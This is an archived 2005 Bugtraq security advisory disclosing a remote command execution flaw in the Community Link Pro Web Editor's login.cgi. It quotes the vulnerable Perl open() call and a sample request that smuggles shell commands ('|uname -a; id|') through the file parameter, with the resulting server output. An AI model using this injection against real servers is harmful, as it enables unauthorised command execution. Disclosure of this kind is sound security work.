Bugtraq mailing list archives
[badroot security] Community link pro web editor: Remote command Execution
From: mozako <mozako () mybox it>
Date: Wed, 29 Jun 2005 15:44:58 +0000
- - - - - - - - - - - - - - - - - - - - - - - - - BADROOT SECURITY GROUP
Security Advisory 2005-#0x05 http://www.badroot.org irc.us.azzurra.org ~ #badroot- - - - - - - - - - - - - - - - - - - - - - - - - Authors ....... spher3 (spher3 at fatalimpulse dot net) mozako (admin at fatalimpulse dot net)
Date ............. 29-06-2005 Product ....... Community Link Pro Web Editor (login.cgi) Type ............ Remote Command Execution o Description: ============================Login.cgi is a login script written in perl by Community Link Pro Web Editor that allows to a remote user to login in his own personal page.
o Vulnerable Code: ============================ [...] open(FILE2,"$memberspath/$FORM{'username'}/$FORM{'file'}"); foreach (<FILE2>) { print; } close(FILE2); [...] In this code there isn't a control in cgi query and exactly in $FORM{'file'}.Without a control you can run system command remotely (Remote Command Execution Vulnerability) with a string like login.cgi?username=&command=simple&do=edit&password=&file=|COMMAND|.
Example: http://www.hostvuln.net/app/webeditor/login.cgi?username=&command=simple&do=edit&password=&file=|uname -a; id| Linux host.vuln.net 2.6.10-3mdk #1 Tue Feb 22 01:32:42 CET 2005 i686 unknown unknown GNU/Linux uid=72(apache) gid=72(apache) groups=72(apache) o Proof of concept: ============================You can download a simple PoC Exploit from: http://www.badroot.org/exploits/clogin.pl
Original ADV: http://www.badroot.org/advisories/SA0x05
Current thread:
- [badroot security] Community link pro web editor: Remote command Execution mozako (Jun 29)